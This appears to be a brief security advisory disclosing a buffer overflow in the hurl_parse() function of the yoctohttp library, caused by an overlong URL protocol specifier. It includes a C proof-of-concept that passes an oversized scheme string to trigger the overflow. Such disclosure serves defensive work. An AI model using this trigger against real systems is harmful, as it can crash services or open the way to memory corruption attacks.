CSECA-07002 - Buffer overflow in hurl_parse()

The protocol specifier is copied into a fixed size buffer. Supplying a protocol type larger than the buffer size - 1 will cause the buffer to overflow.

Example Code

#include <yoctohttp/common.h>

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
  hurl_t hurl;
  char *url;

  url = strdup("01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789://localhost/index.html");
  hurl_parse(&hurl, url);
  free(url);

  return 0;
}